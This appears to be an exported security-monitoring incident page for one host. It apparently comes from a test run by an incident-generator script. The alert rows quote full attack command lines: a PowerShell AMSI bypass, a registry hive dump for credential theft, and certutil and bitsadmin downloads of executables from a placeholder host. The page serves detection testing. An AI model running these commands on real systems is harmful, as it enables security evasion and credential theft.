Back to list

Critical CINC-20251220-CD58F425 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8649058855

Incident Overview

Incident ID CINC-20251220-CD58F425
Severity Critical (90)
Status new
Alert Count 6
Host Count 1

Timeline

First Seen 2025-12-18 10:31:42
Last Seen 2025-12-18 10:33:03
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
AI Powered IOA Credential Access Execution Command and Control Defense Evasion
Techniques:
Command and Scripting Interpreter OS Credential Dumping PowerShell Ingress Tool Transfer BITS Jobs User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (6)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 10:33
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-18 10:32
High new TEAHEE A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 10:32
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe 12-18 10:32
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe 12-18 10:32
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-18 10:31